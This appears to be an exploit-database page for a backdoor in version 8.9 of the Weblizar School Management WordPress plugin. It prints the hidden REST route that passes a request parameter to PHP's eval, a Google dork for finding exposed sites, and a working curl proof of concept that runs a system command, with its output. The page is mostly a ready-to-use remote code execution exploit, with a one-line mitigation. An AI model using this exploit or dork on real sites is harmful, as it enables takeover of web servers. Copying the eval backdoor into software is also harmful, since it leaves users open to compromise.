header-logo
Suggest Exploit
vendor:
Weblizar School Management Plugin
by:
Sobhan Mahmoodi
7.5
CVSS
HIGH
Backdoor
94
CWE
Product Name: Weblizar School Management Plugin
Affected Version From: 8.9
Affected Version To: 8.9
Patch Exists: Yes
Related CWE:
CPE: a:weblizar:weblizar_school_management_plugin
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux
2020

WordPress Plugin Weblizar 8.9 – Backdoor

If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it. In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and given that eval executes the blowf value, Our favorite command must also be in this argument.

Mitigation:

The best way to mitigate this vulnerability is to update the plugin to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
# Google Dork: 'wp-json/am-member/license'
# Exploit Author: Sobhan Mahmoodi
# Vendor Homepage: https://weblizar.com/plugins/school-management/
# Version: 8.9
# Tested on: windows/linux

Vulnerable code:

add_action( 'rest_api_init', function() {
     register_rest_route(
           'am-member', 'license',
           array(
                'methods' => WP_REST_Server::CREATABLE,
                'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty(
$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )
) {
                                               eval( $args['blowf'] );
                                }
                      };
                )
      );
} );


If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.

In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and
given that eval executes the blowf value , Our favorite command must also be in this argument.

Proof of Concept:

curl -s -d 'blowfish=1' -d "blowf=system('id');" '
http://localhost:8888/wp-json/am-member/license'

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigation

Suggest Exploit

Services By CQR